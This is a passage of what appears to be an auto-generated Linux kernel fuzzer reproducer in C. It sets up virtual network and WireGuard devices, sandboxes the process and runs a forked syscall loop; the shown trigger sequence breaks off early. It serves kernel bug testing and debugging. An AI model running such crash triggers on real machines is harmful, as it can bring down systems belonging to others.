	err = netlink_send_ext(&nlmsg, sock, id, &total_len, true);
	if (err < 0) {
		goto error;
	}
	offset = 0;
	netdev_index = 0;
	while ((len = netlink_next_msg(&nlmsg, offset, total_len)) != -1) {
		struct nlattr* attr = (struct nlattr*)(nlmsg.buf + offset + NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(genlhdr)));
		for (; (char*)attr < nlmsg.buf + offset + len; attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) {
			if (attr->nla_type == DEVLINK_ATTR_NETDEV_NAME) {
				char* port_name;
				char netdev_name[IFNAMSIZ];
				port_name = (char*)(attr + 1);
				snprintf(netdev_name, sizeof(netdev_name), "%s%d", netdev_prefix, netdev_index);
				netlink_device_change(&nlmsg2, rtsock, port_name, true, 0, 0, 0, netdev_name);
				break;
			}
		}
		offset += len;
		netdev_index++;
	}
error:
	close(rtsock);
	close(sock);
}

#define DEV_IPV4 "172.20.20.%d"
#define DEV_IPV6 "fe80::%02x"
#define DEV_MAC 0x00aaaaaaaaaa

static void netdevsim_add(unsigned int addr, unsigned int port_count)
{
	char buf[16];
	sprintf(buf, "%u %u", addr, port_count);
	if (write_file("/sys/bus/netdevsim/new_device", buf)) {
		snprintf(buf, sizeof(buf), "netdevsim%d", addr);
		initialize_devlink_ports("netdevsim", buf, "netdevsim");
	}
}

#define WG_GENL_NAME "wireguard"
enum wg_cmd {
	WG_CMD_GET_DEVICE,
	WG_CMD_SET_DEVICE,
};
enum wgdevice_attribute {
	WGDEVICE_A_UNSPEC,
	WGDEVICE_A_IFINDEX,
	WGDEVICE_A_IFNAME,
	WGDEVICE_A_PRIVATE_KEY,
	WGDEVICE_A_PUBLIC_KEY,
	WGDEVICE_A_FLAGS,
	WGDEVICE_A_LISTEN_PORT,
	WGDEVICE_A_FWMARK,
	WGDEVICE_A_PEERS,
};
enum wgpeer_attribute {
	WGPEER_A_UNSPEC,
	WGPEER_A_PUBLIC_KEY,
	WGPEER_A_PRESHARED_KEY,
	WGPEER_A_FLAGS,
	WGPEER_A_ENDPOINT,
	WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
	WGPEER_A_LAST_HANDSHAKE_TIME,
	WGPEER_A_RX_BYTES,
	WGPEER_A_TX_BYTES,
	WGPEER_A_ALLOWEDIPS,
	WGPEER_A_PROTOCOL_VERSION,
};
enum wgallowedip_attribute {
	WGALLOWEDIP_A_UNSPEC,
	WGALLOWEDIP_A_FAMILY,
	WGALLOWEDIP_A_IPADDR,
	WGALLOWEDIP_A_CIDR_MASK,
};

static void netlink_wireguard_setup(void)
{
	const char ifname_a[] = "wg0";
	const char ifname_b[] = "wg1";
	const char ifname_c[] = "wg2";
	const char private_a[] = "\xa0\x5c\xa8\x4f\x6c\x9c\x8e\x38\x53\xe2\xfd\x7a\x70\xae\x0f\xb2\x0f\xa1\x52\x60\x0c\xb0\x08\x45\x17\x4f\x08\x07\x6f\x8d\x78\x43";
	const char private_b[] = "\xb0\x80\x73\xe8\xd4\x4e\x91\xe3\xda\x92\x2c\x22\x43\x82\x44\xbb\x88\x5c\x69\xe2\x69\xc8\xe9\xd8\x35\xb1\x14\x29\x3a\x4d\xdc\x6e";
	const char private_c[] = "\xa0\xcb\x87\x9a\x47\xf5\xbc\x64\x4c\x0e\x69\x3f\xa6\xd0\x31\xc7\x4a\x15\x53\xb6\xe9\x01\xb9\xff\x2f\x51\x8c\x78\x04\x2f\xb5\x42";
	const char public_a[] = "\x97\x5c\x9d\x81\xc9\x83\xc8\x20\x9e\xe7\x81\x25\x4b\x89\x9f\x8e\xd9\x25\xae\x9f\x09\x23\xc2\x3c\x62\xf5\x3c\x57\xcd\xbf\x69\x1c";
	const char public_b[] = "\xd1\x73\x28\x99\xf6\x11\xcd\x89\x94\x03\x4d\x7f\x41\x3d\xc9\x57\x63\x0e\x54\x93\xc2\x85\xac\xa4\x00\x65\xcb\x63\x11\xbe\x69\x6b";
	const char public_c[] = "\xf4\x4d\xa3\x67\xa8\x8e\xe6\x56\x4f\x02\x02\x11\x45\x67\x27\x08\x2f\x5c\xeb\xee\x8b\x1b\xf5\xeb\x73\x37\x34\x1b\x45\x9b\x39\x22";
	const uint16_t listen_a = 20001;
	const uint16_t listen_b = 20002;
	const uint16_t listen_c = 20003;
	const uint16_t af_inet = AF_INET;
	const uint16_t af_inet6 = AF_INET6;
	const struct sockaddr_in endpoint_b_v4 = {
	    .sin_family = AF_INET,
	    .sin_port = htons(listen_b),
	    .sin_addr = {htonl(INADDR_LOOPBACK)}};
	const struct sockaddr_in endpoint_c_v4 = {
	    .sin_family = AF_INET,
	    .sin_port = htons(listen_c),
	    .sin_addr = {htonl(INADDR_LOOPBACK)}};
	struct sockaddr_in6 endpoint_a_v6 = {
	    .sin6_family = AF_INET6,
	    .sin6_port = htons(listen_a)};
	endpoint_a_v6.sin6_addr = in6addr_loopback;
	struct sockaddr_in6 endpoint_c_v6 = {
	    .sin6_family = AF_INET6,
	    .sin6_port = htons(listen_c)};
	endpoint_c_v6.sin6_addr = in6addr_loopback;
	const struct in_addr first_half_v4 = {0};
	const struct in_addr second_half_v4 = {(uint32_t)htonl(128 << 24)};
	const struct in6_addr first_half_v6 = {{{0}}};
	const struct in6_addr second_half_v6 = {{{0x80}}};
	const uint8_t half_cidr = 1;
	const uint16_t persistent_keepalives[] = {1, 3, 7, 9, 14, 19};
	struct genlmsghdr genlhdr = {
	    .cmd = WG_CMD_SET_DEVICE,
	    .version = 1};
	int sock;
	int id, err;
	sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
	if (sock == -1) {
		return;
	}
	id = netlink_query_family_id(&nlmsg, sock, WG_GENL_NAME, true);
	if (id == -1)
		goto error;
	netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_a, strlen(ifname_a) + 1);
	netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_a, 32);
	netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_a, 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, sizeof(endpoint_b_v4));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[0], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, sizeof(first_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, sizeof(first_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v6, sizeof(endpoint_c_v6));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[1], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, sizeof(second_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, sizeof(second_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	err = netlink_send(&nlmsg, sock);
	if (err < 0) {
	}
	netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_b, strlen(ifname_b) + 1);
	netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_b, 32);
	netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_b, 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, sizeof(endpoint_a_v6));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[2], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, sizeof(first_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, sizeof(first_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v4, sizeof(endpoint_c_v4));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[3], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, sizeof(second_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, sizeof(second_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	err = netlink_send(&nlmsg, sock);
	if (err < 0) {
	}
	netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_c, strlen(ifname_c) + 1);
	netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_c, 32);
	netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_c, 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, sizeof(endpoint_a_v6));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[4], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, sizeof(first_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, sizeof(first_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32);
	netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, sizeof(endpoint_b_v4));
	netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, &persistent_keepalives[5], 2);
	netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, sizeof(second_half_v4));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_nest(&nlmsg, NLA_F_NESTED | 0);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
	netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, sizeof(second_half_v6));
	netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	netlink_done(&nlmsg);
	err = netlink_send(&nlmsg, sock);
	if (err < 0) {
	}

error:
	close(sock);
}
static void initialize_netdevices(void)
{
	char netdevsim[16];
	sprintf(netdevsim, "netdevsim%d", (int)procid);
	struct {
		const char* type;
		const char* dev;
	} devtypes[] = {
	    {"ip6gretap", "ip6gretap0"},
	    {"bridge", "bridge0"},
	    {"vcan", "vcan0"},
	    {"bond", "bond0"},
	    {"team", "team0"},
	    {"dummy", "dummy0"},
	    {"nlmon", "nlmon0"},
	    {"caif", "caif0"},
	    {"batadv", "batadv0"},
	    {"vxcan", "vxcan1"},
	    {"netdevsim", netdevsim},
	    {"veth", 0},
	    {"xfrm", "xfrm0"},
	    {"wireguard", "wg0"},
	    {"wireguard", "wg1"},
	    {"wireguard", "wg2"},
	};
	const char* devmasters[] = {"bridge", "bond", "team", "batadv"};
	struct {
		const char* name;
		int macsize;
		bool noipv6;
	} devices[] = {
	    {"lo", ETH_ALEN},
	    {"sit0", 0},
	    {"bridge0", ETH_ALEN},
	    {"vcan0", 0, true},
	    {"tunl0", 0},
	    {"gre0", 0},
	    {"gretap0", ETH_ALEN},
	    {"ip_vti0", 0},
	    {"ip6_vti0", 0},
	    {"ip6tnl0", 0},
	    {"ip6gre0", 0},
	    {"ip6gretap0", ETH_ALEN},
	    {"erspan0", ETH_ALEN},
	    {"bond0", ETH_ALEN},
	    {"veth0", ETH_ALEN},
	    {"veth1", ETH_ALEN},
	    {"team0", ETH_ALEN},
	    {"veth0_to_bridge", ETH_ALEN},
	    {"veth1_to_bridge", ETH_ALEN},
	    {"veth0_to_bond", ETH_ALEN},
	    {"veth1_to_bond", ETH_ALEN},
	    {"veth0_to_team", ETH_ALEN},
	    {"veth1_to_team", ETH_ALEN},
	    {"veth0_to_hsr", ETH_ALEN},
	    {"veth1_to_hsr", ETH_ALEN},
	    {"hsr0", 0},
	    {"dummy0", ETH_ALEN},
	    {"nlmon0", 0},
	    {"vxcan0", 0, true},
	    {"vxcan1", 0, true},
	    {"caif0", ETH_ALEN},
	    {"batadv0", ETH_ALEN},
	    {netdevsim, ETH_ALEN},
	    {"xfrm0", ETH_ALEN},
	    {"veth0_virt_wifi", ETH_ALEN},
	    {"veth1_virt_wifi", ETH_ALEN},
	    {"virt_wifi0", ETH_ALEN},
	    {"veth0_vlan", ETH_ALEN},
	    {"veth1_vlan", ETH_ALEN},
	    {"vlan0", ETH_ALEN},
	    {"vlan1", ETH_ALEN},
	    {"macvlan0", ETH_ALEN},
	    {"macvlan1", ETH_ALEN},
	    {"ipvlan0", ETH_ALEN},
	    {"ipvlan1", ETH_ALEN},
	    {"veth0_macvtap", ETH_ALEN},
	    {"veth1_macvtap", ETH_ALEN},
	    {"macvtap0", ETH_ALEN},
	    {"macsec0", ETH_ALEN},
	    {"veth0_to_batadv", ETH_ALEN},
	    {"veth1_to_batadv", ETH_ALEN},
	    {"batadv_slave_0", ETH_ALEN},
	    {"batadv_slave_1", ETH_ALEN},
	    {"geneve0", ETH_ALEN},
	    {"geneve1", ETH_ALEN},
	    {"wg0", 0},
	    {"wg1", 0},
	    {"wg2", 0},
	};
	int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (sock == -1)
		exit(1);
	unsigned i;
	for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++)
		netlink_add_device(&nlmsg, sock, devtypes[i].type, devtypes[i].dev);
	for (i = 0; i < sizeof(devmasters) / (sizeof(devmasters[0])); i++) {
		char master[32], slave0[32], veth0[32], slave1[32], veth1[32];
		sprintf(slave0, "%s_slave_0", devmasters[i]);
		sprintf(veth0, "veth0_to_%s", devmasters[i]);
		netlink_add_veth(&nlmsg, sock, slave0, veth0);
		sprintf(slave1, "%s_slave_1", devmasters[i]);
		sprintf(veth1, "veth1_to_%s", devmasters[i]);
		netlink_add_veth(&nlmsg, sock, slave1, veth1);
		sprintf(master, "%s0", devmasters[i]);
		netlink_device_change(&nlmsg, sock, slave0, false, master, 0, 0, NULL);
		netlink_device_change(&nlmsg, sock, slave1, false, master, 0, 0, NULL);
	}
	netlink_device_change(&nlmsg, sock, "bridge_slave_0", true, 0, 0, 0, NULL);
	netlink_device_change(&nlmsg, sock, "bridge_slave_1", true, 0, 0, 0, NULL);
	netlink_add_veth(&nlmsg, sock, "hsr_slave_0", "veth0_to_hsr");
	netlink_add_veth(&nlmsg, sock, "hsr_slave_1", "veth1_to_hsr");
	netlink_add_hsr(&nlmsg, sock, "hsr0", "hsr_slave_0", "hsr_slave_1");
	netlink_device_change(&nlmsg, sock, "hsr_slave_0", true, 0, 0, 0, NULL);
	netlink_device_change(&nlmsg, sock, "hsr_slave_1", true, 0, 0, 0, NULL);
	netlink_add_veth(&nlmsg, sock, "veth0_virt_wifi", "veth1_virt_wifi");
	netlink_add_linked(&nlmsg, sock, "virt_wifi", "virt_wifi0", "veth1_virt_wifi");
	netlink_add_veth(&nlmsg, sock, "veth0_vlan", "veth1_vlan");
	netlink_add_vlan(&nlmsg, sock, "vlan0", "veth0_vlan", 0, htons(ETH_P_8021Q));
	netlink_add_vlan(&nlmsg, sock, "vlan1", "veth0_vlan", 1, htons(ETH_P_8021AD));
	netlink_add_macvlan(&nlmsg, sock, "macvlan0", "veth1_vlan");
	netlink_add_macvlan(&nlmsg, sock, "macvlan1", "veth1_vlan");
	netlink_add_ipvlan(&nlmsg, sock, "ipvlan0", "veth0_vlan", IPVLAN_MODE_L2, 0);
	netlink_add_ipvlan(&nlmsg, sock, "ipvlan1", "veth0_vlan", IPVLAN_MODE_L3S, IPVLAN_F_VEPA);
	netlink_add_veth(&nlmsg, sock, "veth0_macvtap", "veth1_macvtap");
	netlink_add_linked(&nlmsg, sock, "macvtap", "macvtap0", "veth0_macvtap");
	netlink_add_linked(&nlmsg, sock, "macsec", "macsec0", "veth1_macvtap");
	char addr[32];
	sprintf(addr, DEV_IPV4, 14 + 10);
	struct in_addr geneve_addr4;
	if (inet_pton(AF_INET, addr, &geneve_addr4) <= 0)
		exit(1);
	struct in6_addr geneve_addr6;
	if (inet_pton(AF_INET6, "fc00::01", &geneve_addr6) <= 0)
		exit(1);
	netlink_add_geneve(&nlmsg, sock, "geneve0", 0, &geneve_addr4, 0);
	netlink_add_geneve(&nlmsg, sock, "geneve1", 1, 0, &geneve_addr6);
	netdevsim_add((int)procid, 4);
	netlink_wireguard_setup();
	for (i = 0; i < sizeof(devices) / (sizeof(devices[0])); i++) {
		char addr[32];
		sprintf(addr, DEV_IPV4, i + 10);
		netlink_add_addr4(&nlmsg, sock, devices[i].name, addr);
		if (!devices[i].noipv6) {
			sprintf(addr, DEV_IPV6, i + 10);
			netlink_add_addr6(&nlmsg, sock, devices[i].name, addr);
		}
		uint64_t macaddr = DEV_MAC + ((i + 10ull) << 40);
		netlink_device_change(&nlmsg, sock, devices[i].name, true, 0, &macaddr, devices[i].macsize, NULL);
	}
	close(sock);
}
static void initialize_netdevices_init(void)
{
	int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (sock == -1)
		exit(1);
	struct {
		const char* type;
		int macsize;
		bool noipv6;
		bool noup;
	} devtypes[] = {
	    {"nr", 7, true},
	    {"rose", 5, true, true},
	};
	unsigned i;
	for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) {
		char dev[32], addr[32];
		sprintf(dev, "%s%d", devtypes[i].type, (int)procid);
		sprintf(addr, "172.30.%d.%d", i, (int)procid + 1);
		netlink_add_addr4(&nlmsg, sock, dev, addr);
		if (!devtypes[i].noipv6) {
			sprintf(addr, "fe88::%02x:%02x", i, (int)procid + 1);
			netlink_add_addr6(&nlmsg, sock, dev, addr);
		}
		int macsize = devtypes[i].macsize;
		uint64_t macaddr = 0xbbbbbb + ((unsigned long long)i << (8 * (macsize - 2))) +
				 (procid << (8 * (macsize - 1)));
		netlink_device_change(&nlmsg, sock, dev, !devtypes[i].noup, 0, &macaddr, macsize, NULL);
	}
	close(sock);
}

#define MAX_FDS 30

static void setup_common()
{
	if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
	}
}

static void setup_binderfs()
{
	if (mkdir("/dev/binderfs", 0777)) {
	}
	if (mount("binder", "/dev/binderfs", "binder", 0, NULL)) {
	}
	if (symlink("/dev/binderfs", "./binderfs")) {
	}
}

static void loop();

static void sandbox_common()
{
	prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
	setsid();
	struct rlimit rlim;
	rlim.rlim_cur = rlim.rlim_max = (200 << 20);
	setrlimit(RLIMIT_AS, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 32 << 20;
	setrlimit(RLIMIT_MEMLOCK, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 136 << 20;
	setrlimit(RLIMIT_FSIZE, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 1 << 20;
	setrlimit(RLIMIT_STACK, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 0;
	setrlimit(RLIMIT_CORE, &rlim);
	rlim.rlim_cur = rlim.rlim_max = 256;
	setrlimit(RLIMIT_NOFILE, &rlim);
	if (unshare(CLONE_NEWNS)) {
	}
	if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
	}
	if (unshare(CLONE_NEWIPC)) {
	}
	if (unshare(0x02000000)) {
	}
	if (unshare(CLONE_NEWUTS)) {
	}
	if (unshare(CLONE_SYSVSEM)) {
	}
	typedef struct {
		const char* name;
		const char* value;
	} sysctl_t;
	static const sysctl_t sysctls[] = {
	    {"/proc/sys/kernel/shmmax", "16777216"},
	    {"/proc/sys/kernel/shmall", "536870912"},
	    {"/proc/sys/kernel/shmmni", "1024"},
	    {"/proc/sys/kernel/msgmax", "8192"},
	    {"/proc/sys/kernel/msgmni", "1024"},
	    {"/proc/sys/kernel/msgmnb", "1024"},
	    {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
	};
	unsigned i;
	for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
		write_file(sysctls[i].name, sysctls[i].value);
}

static int wait_for_loop(int pid)
{
	if (pid < 0)
		exit(1);
	int status = 0;
	while (waitpid(-1, &status, __WALL) != pid) {
	}
	return WEXITSTATUS(status);
}

static void drop_caps(void)
{
	struct __user_cap_header_struct cap_hdr = {};
	struct __user_cap_data_struct cap_data[2] = {};
	cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
	cap_hdr.pid = getpid();
	if (syscall(SYS_capget, &cap_hdr, &cap_data))
		exit(1);
	const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
	cap_data[0].effective &= ~drop;
	cap_data[0].permitted &= ~drop;
	cap_data[0].inheritable &= ~drop;
	if (syscall(SYS_capset, &cap_hdr, &cap_data))
		exit(1);
}

static int do_sandbox_none(void)
{
	//if (unshare(CLONE_NEWPID)) {
	//}
	//int pid = fork();
	//if (pid != 0)
	//	return wait_for_loop(pid);
	setup_common();
	sandbox_common();
	//drop_caps();
	initialize_netdevices_init();
	//if (unshare(CLONE_NEWNET)) {
	//}
	write_file("/proc/sys/net/ipv4/ping_group_range", "0 65535");
	initialize_netdevices();
	//setup_binderfs();
	loop();
	//exit(1);
	return 0; /* not reached: loop() never returns */
}

static void kill_and_wait(int pid, int* status)
{
	kill(-pid, SIGKILL);
	kill(pid, SIGKILL);
	for (int i = 0; i < 100; i++) {
		if (waitpid(-1, status, WNOHANG | __WALL) == pid)
			return;
		usleep(1000);
	}
	DIR* dir = opendir("/sys/fs/fuse/connections");
	if (dir) {
		for (;;) {
			struct dirent* ent = readdir(dir);
			if (!ent)
				break;
			if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
				continue;
			char abort[300];
			snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
			int fd = open(abort, O_WRONLY);
			if (fd == -1) {
				continue;
			}
			if (write(fd, abort, 1) < 0) {
			}
			close(fd);
		}
		closedir(dir);
	} else {
	}
	while (waitpid(-1, status, __WALL) != pid) {
	}
}

static void setup_test()
{
	prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
	setpgrp();
	write_file("/proc/self/oom_score_adj", "1000");
}

static void close_fds()
{
	for (int fd = 3; fd < MAX_FDS; fd++)
		close(fd);
}

static void execute_one(void);

#define WAIT_FLAGS __WALL

static void loop(void)
{
	int iter = 0;
	for (;; iter++) {
		int pid = fork();
		if (pid < 0)
			exit(1);
		if (pid == 0) {
			setup_test();
			execute_one();
			close_fds();
			exit(0);
		}
		int status = 0;
		uint64_t start = current_time_ms();
		for (;;) {
			if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
				break;
			sleep_ms(1);
			if (current_time_ms() - start < 5000)
				continue;
			kill_and_wait(pid, &status);
			break;
		}
	}
}

uint64_t r[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

void execute_one(void)
{
	intptr_t res = 0;
	res = syscall(__NR_pipe, 0x20000000ul);
	if (res != -1) {
		r[0] = *(uint32_t*)0x20000000;
		r[1] = *(uint32_t*)0x20000004;
	}
	res = syscall(__NR_socket, 2ul, 2ul, 0);
	if (res != -1)
		r[2] = res;
	syscall(__NR_close, r[2]);
	res = syscall(__NR_socket, 0xaul, 3ul, 0x3c);
	if (res != -1)
		r[3] = res;
	*(uint8_t*)0x20000100 = 0x7f;
	*(uint8_t*)0x20000101 = 0x45;
	*(uint8_t*)0x20000102 = 0x4c;
	*(uint8_t*)0x20000103 = 0x46;
	*(uint8_t*)0x20000104 = 0;
	*(uint8_t*)0x20000105 = 0;
	*(uint8_t*)0x20000106 = 0x30;
	*(uint8_t*)0x20000107 = 0;
	*(uint64_t*)0x20000108 = 0;
	*(uint16_t*)0x20000110 = 0;
	*(uint16_t*)0x20000112 = 0;
	*(uint32_t*)0x20000114 = 0;
	*(uint32_t*)0x20000118 = 0;
	*(uint32_t*)0x2000011c = 0x38;
	*(uint32_t*)0x20000120 = 0;
	*(uint32_t*)0x20000124 = 0x800000;
	*(uint16_t*)0x20000128 = 0;
	*(uint16_t*)0x2000012a = 0x20;
	*(uint16_t*)0x2000012c = 1;
	*(uint16_t*)0x2000012e = 0;
	*(uint16_t*)0x20000130 = 0;
	*(uint16_t*)0x20000132 = 0x80;
	memset((void*)0x20000138, 0, 256);
	memset((void*)0x20000238, 0, 256);
	memset((void*)0x20000338, 0, 256);
	memset((void*)0x20000438, 0, 256);
	memset((void*)0x20000538, 0, 256);
	memset((void*)0x20000638, 0, 256);
	memset((void*)0x20000738, 0, 256);
	memset((void*)0x20000838, 0, 256);
	syscall(__NR_write, r[1], 0x20000100ul, 0x838ul);
